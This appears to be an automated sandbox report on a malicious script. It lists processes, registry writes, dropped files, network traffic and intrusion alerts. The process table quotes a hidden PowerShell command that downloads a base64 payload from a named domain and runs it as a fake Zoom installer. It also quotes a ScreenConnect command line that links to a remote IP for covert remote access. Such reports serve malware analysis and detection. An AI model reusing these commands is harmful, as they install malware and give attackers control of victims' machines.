| File name: | bcb97cf5312f953650a63dcb45319fde1b287bfea7026fb0379095dd894c82bbrl |
| Full analysis: | https://app.any.run/tasks/ee1cdc89-170b-43b9-979f-c19aa08872ba |
| Verdict: | Malicious activity |
| Analysis date: | June 21, 2025, 18:04:45 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | Unicode text, UTF-8 text, with CRLF line terminators |
| MD5: | C8A17CF22CFCB4D639447143C7058B7F |
| SHA1: | 469F068804E62B1A0B4E147CAC4D7AECF70F4DB6 |
| SHA256: | BCB97CF5312F953650A63DCB45319FDE1B287BFEA7026FB0379095DD894C82BB |
| SSDEEP: | 3072:fcnqxrHKQeu3VmxWSs3O9zSu8h3hU0JTOOjBn02BMy11P+vgrIUjRBzXZsU1X1jT:bjfhp |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 856 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\5b4d3b0913e89c0a\ScreenConnect.ClientSetup.msi" | C:\Windows\SysWOW64\msiexec.exe | ZoomMeetingsInstall-6.4.12-69047.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows® installer Exit code: 0 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1068 | C:\WINDOWS\system32\vssvc.exe | C:\Windows\System32\VSSVC.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1096 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1604 | "C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\bcb97cf5312f953650a63dcb45319fde1b287bfea7026fb0379095dd894c82bbrl.js | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 1644 | rundll32.exe "C:\Users\admin\AppData\Local\Temp\MSID1A8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_1561078 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments | C:\Windows\SysWOW64\rundll32.exe | msiexec.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2192 | "C:\Program Files (x86)\ScreenConnect Client (5b4d3b0913e89c0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=45.8.125.187&p=8041&s=12a816fe-9b1a-4459-9639-ae157a2bfaf5&k=BgIAAACkAABSU0ExAAgAAAEAAQCd2g8uWxRPQbkh9s%2bsS0xP2nYUfBt4LPdh6tRukHOu6IyOKL8fxn49SXW6Y5cRL3z2AM9XzsTmwoa90JsFk8IZnLAGAzA3Vvno0TPUpp39pyf1COrPwiSC2tnTcV0FWII1xU%2fFk8JJDTZhrBNOCTmSGv2%2bl4RciLj85jkzeEEYpeh1ipk%2fvoPeizPRnezSe1p40rXKp%2b4zPQcTLZtx33%2f%2fuovZSG5zoC%2fbWNDtxWyzIczAnvbfx8M0hL5c4M7%2bE4cl8VHN5sXNFm%2f9Z%2bAqgmpg%2bSv%2fwdBe1tPYIbF8WtTptYsbYkNd5DCaD4FrqiKIhwqGXeMC6YA3ougPgl74qfaW&t=Quality%20Assurance&c=Helix&c=g61zXr-mineevening-18-Jun-2025&c=Ironclad&c=Red%20Hat%20Enterprise%20Linux%208&c=&c=&c=&c=" | C:\Program Files (x86)\ScreenConnect Client (5b4d3b0913e89c0a)\ScreenConnect.ClientService.exe | services.exe | ||||||||||||
User: SYSTEM Integrity Level: SYSTEM Version: 24.3.7.9067 Modules
| |||||||||||||||
| 2216 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -c "$b = [Convert]::FromBase64String((Invoke-WebRequest -Uri 'https://pneuservisjirkalovi.com/load2/src/file.txt').Content);[IO.File]::WriteAllBytes('C:\Users\admin\AppData\Local\Temp\ZoomMeetingsInstall-6.4.12-69047.exe', $b);Start-Process -FilePath 'C:\Users\admin\AppData\Local\Temp\ZoomMeetingsInstall-6.4.12-69047.exe' -WindowStyle Hidden" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2708 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | SrTasks.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3108 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4664 | "C:\Users\admin\AppData\Local\Temp\ZoomMeetingsInstall-6.4.12-69047.exe" | C:\Users\admin\AppData\Local\Temp\ZoomMeetingsInstall-6.4.12-69047.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| (PID) Process: | (1604) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (1604) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (1604) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (1604) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe |
| Operation: | write | Name: | JScriptSetScriptStateStarted |
Value: BA78170000000000 | |||
| (PID) Process: | (5928) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore |
| Operation: | write | Name: | SrCreateRp (Enter) |
Value: 4800000000000000D4115C0DD7E2DB0128170000DC130000D50700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
| (PID) Process: | (5928) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP |
| Operation: | write | Name: | SppGetSnapshots (Enter) |
Value: 4800000000000000D4115C0DD7E2DB0128170000DC130000D20700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
| (PID) Process: | (5552) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (5552) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (5552) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (5928) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP |
| Operation: | write | Name: | SppEnumGroups (Leave) |
Value: 4800000000000000A52B820DD7E2DB0128170000DC130000D10700000100000000000000010000000000000000000000000000000000000000000000000000000000000000000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4664 | ZoomMeetingsInstall-6.4.12-69047.exe | C:\Users\admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\5b4d3b0913e89c0a\ScreenConnect.ClientSetup.msi | — | |
MD5:— | SHA256:— | |||
| 1604 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\fetch[1].js | text | |
MD5:2232AC5F3EDFBD83DB4498CEC1457350 | SHA256:BB485BC0C5BA8FF0237DFB56D7853EB1491CA8B5CEA13E5B970B93B331DC8376 | |||
| 1604 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\cleanup[1].js | binary | |
MD5:6B8883344EBF7B3A4C74155480D89DBF | SHA256:741031BEDC35AC85C6BCBCB3B3ABCC2D2D76585D19F24CDBF4B92C4551AF53BF | |||
| 1604 | wscript.exe | C:\Users\admin\AppData\Local\Temp\ZoomMeetingsInstall-6.4.12-91393.hta | html | |
MD5:1AB28504433CE0423FF13474A897733B | SHA256:5D76EE081A6154F46F7BB41E8BA3F93DBE89632121D7D4804D07DBD7E8BBB238 | |||
| 5928 | msiexec.exe | C:\System Volume Information\SPP\metadata-2 | — | |
MD5:— | SHA256:— | |||
| 5928 | msiexec.exe | C:\Windows\Installer\17fc32.msi | — | |
MD5:— | SHA256:— | |||
| 1604 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\execute[1].js | text | |
MD5:085D474DD73814B4FCBE431B5831702E | SHA256:9F6F4B6F3817CED01ACAB8A5A2606EA28750D913A90906424C44F11152ED5636 | |||
| 1604 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\file2[1].jpg | binary | |
MD5:1AA8A42FD9E2C88BBB3606EB7A263EEC | SHA256:6C369DD2957C3AD2CF723A1422E2E8332799A22A0D31C2F532DB27216919B933 | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yzh1qlsb.q0d.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ZoomMeetingsInstall-6.4.12-69047.exe | executable | |
MD5:68D1EBDFB8956398112CCED42377A32F | SHA256:850B8338F81454AB47E5068C3A4689630E4998BE4D16ECE9DCC9AED8B67F080B | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | POST | 200 | 20.190.160.3:443 | https://login.live.com/RST2.srf | unknown | xml | 11.1 Kb | whitelisted |
— | — | POST | 200 | 20.190.160.130:443 | https://login.live.com/RST2.srf | unknown | xml | 11.1 Kb | whitelisted |
— | — | POST | 200 | 20.190.160.131:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | whitelisted |
— | — | POST | 200 | 20.190.160.20:443 | https://login.live.com/RST2.srf | unknown | xml | 11.1 Kb | whitelisted |
— | — | POST | 200 | 40.126.32.140:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | whitelisted |
— | — | GET | 200 | 104.21.61.130:443 | https://pneuservisjirkalovi.com/load2/src/config.js | unknown | text | 319 b | — |
— | — | GET | 200 | 172.67.210.137:443 | https://pneuservisjirkalovi.com/load2/src/fetch.js | unknown | text | 156 b | — |
4380 | RUXIMICS.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4380 | RUXIMICS.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1268 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1604 | wscript.exe | 172.67.210.137:443 | pneuservisjirkalovi.com | CLOUDFLARENET | US | unknown |
4380 | RUXIMICS.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
1268 | svchost.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
5944 | MoUsoCoreWorker.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
4380 | RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
pneuservisjirkalovi.com |
| unknown |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
— | — | Misc activity | ET INFO Observed UA-CPU Header |
— | — | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
— | — | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
— | — | Potentially Bad Traffic | ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1 |
— | — | Potentially Bad Traffic | ET ATTACK_RESPONSE PowerShell Base64 Encoded Content Command Common In Powershell Stagers M2 |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET HUNTING EXE Base64 Encoded potential malware |